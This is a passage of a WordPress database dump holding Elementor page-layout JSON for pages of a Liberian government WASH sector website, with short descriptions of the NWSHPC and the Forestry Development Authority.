Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"573143f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"729b52c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"455a18c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2875b46\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:wash\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(16275,2457,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ef0e5ce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Water, sanitation and hygiene not only improve the quality of life but also bring tangible health, environmental and economic benefits and contribute to poverty reduction. With the current poor access to water, sanitation and good hygiene practices in Liberia, it should be noted that Liberia is losing a notable proportion of its GDP and not financing WASH will contribute to preventing Liberia from reaching its vision of becoming a middle income country by 2030.<\\/p><p>The Government of Liberia (GoL) has taken the initiative to accelerate the delivery of water, sanitation and hygiene (WASH) services in the country. A coordinated, comprehensive, and well-targeted investment programme to increase safe water coverage and reduce diseases is being implemented. This website brings together all information on the Liberia WASH Sector \\u2014 stakeholders, events, project information, water point mapping data, and much more. The site is managed by the National Water Sanitation and Hygiene Promotion Committee (NWSHPC).<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3c15c0a\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"67bf510\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f23c00\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"06ca2c7\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"wash\\\",\\\"tag_id\\\":\\\"166\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"wash\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"573143f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"729b52c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"455a18c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2875b46\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:wash\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(16281,2457,'_dp_original','1586'),(16282,2457,'_edit_lock','1629232899:42'),(16283,2457,'_edit_last','42'),(16284,2458,'_elementor_edit_mode','builder'),(16285,2458,'_elementor_template_type','wp-post'),(16286,2458,'_elementor_version','2.7.5'),(16287,2458,'_wp_page_template','default'),(16288,2458,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ef0e5ce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Forestry Development Authority (FDA) is mandated to sustainably manage and conserve all forest resources for the benefit of present and future generation. The National Resource Law and recent National Forestry Reform Law are legal instruments that strengthened its mandate and served as guides for the management of forest resources in Liberia.<\\/p><p>Integrating the 3-Cs approach, FDA works to conserve and sustainably manage forest resources to enable them continue to provision complete range of goods and services for the benefit of all Liberians and also to contribute to the reduction of poverty.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f335f32\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"729b52c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"cb943b8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cb32b63\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Coming up\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"573143f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"729b52c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"455a18c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2875b46\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:fda\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(16290,2458,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:2;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:2;s:21:\"typography_typography\";i:2;s:20:\"typography_font_size\";i:2;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:5;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(16294,2461,'_elementor_edit_mode','builder'),(16295,2461,'_elementor_template_type','wp-post'),(16296,2461,'_elementor_version','2.7.5'),(16297,2461,'_wp_page_template','default'),(16298,2461,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ef0e5ce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Water, sanitation and hygiene not only improve the quality of life but also bring tangible health, environmental and economic benefits and contribute to poverty reduction. With the current poor access to water, sanitation and good hygiene practices in Liberia, it should be noted that Liberia is losing a notable proportion of its GDP and not financing WASH will contribute to preventing Liberia from reaching its vision of becoming a middle income country by 2030.<\\/p><p>The Government of Liberia (GoL) has taken the initiative to accelerate the delivery of water, sanitation and hygiene (WASH) services in the country. A coordinated, comprehensive, and well-targeted investment programme to increase safe water coverage and reduce diseases is being implemented. This website brings together all information on the Liberia WASH Sector \\u2014 stakeholders, events, project information, water point mapping data, and much more. The site is managed by the National Water Sanitation and Hygiene Promotion Committee (NWSHPC).<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f335f32\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"729b52c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"cb943b8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cb32b63\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Coming up\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"573143f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"729b52c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"455a18c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2875b46\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:wash\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(16309,2463,'_elementor_edit_mode','builder'),(16310,2463,'_elementor_template_type','wp-post'),(16311,2463,'_elementor_version','2.7.5'),(16312,2463,'_wp_page_template','default'),(16313,2463,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ef0e5ce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Water, sanitation and hygiene not only improve the quality of life but also bring tangible health, environmental and economic benefits and contribute to poverty reduction. With the current poor access to water, sanitation and good hygiene practices in Liberia, it should be noted that Liberia is losing a notable proportion of its GDP and not financing WASH will contribute to preventing Liberia from reaching its vision of becoming a middle income country by 2030.<\\/p><p>The Government of Liberia (GoL) has taken the initiative to accelerate the delivery of water, sanitation and hygiene (WASH) services in the country. A coordinated, comprehensive, and well-targeted investment programme to increase safe water coverage and reduce diseases is being implemented. This website brings together all information on the Liberia WASH Sector \\u2014 stakeholders, events, project information, water point mapping data, and much more. The site is managed by the National Water Sanitation and Hygiene Promotion Committee 